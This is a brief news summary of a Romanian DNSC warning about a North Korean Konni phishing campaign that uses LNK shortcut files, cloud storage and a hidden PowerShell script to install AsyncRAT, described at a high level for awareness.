The Romanian National Directorate of Cyber Security (DNSC) issued an important warning about an ongoing phishing campaign attributed to the North Korean group Konni

- The Romanian National Directorate of Cyber Security (DNSC) warned on March 19, 2025, about a phishing campaign linked to the North Korean group Konni. This group targets users by sending emails that include harmful LNK files. - Phishing is a method used to infect users' computers, where malware is downloaded through trusted cloud services like Dropbox or Google Drive, making it harder to identify the attack. The DNSC indicated that this ongoing campaign has been observed through monitoring open sources online and is associated with North Korean state actors known as APT37 and Kimsuki. - The attackers utilize cloud storage platforms to hide their malicious actions, which are typically considered secure. Experts stress that users should remain vigilant and avoid opening suspicious files or links sent via email, even if they seem to come from trustworthy sources. - The Konni group employs LNK files to spread AsyncRAT malware. These shortcut files exploit the Windows operating system to run harmful commands without requiring macros, a common defense mechanism against malware in Microsoft's Office products. When targeted users access these harmful files, a concealed PowerShell script is executed, which downloads and displays a fake document while secretly installing the malware. - Attackers use command-and-control servers and trusted cloud services at multiple points during the attack to install malware on victims' systems. The Konni group has been active since 2014, targeting mainly South Korean and Russian systems, and is associated with the Kimsuky group connected to North Korea's military intelligence. Their attacks often aim to steal data and exhibit similarities to tactics used by state actors like APT37 and the Lazarus Group.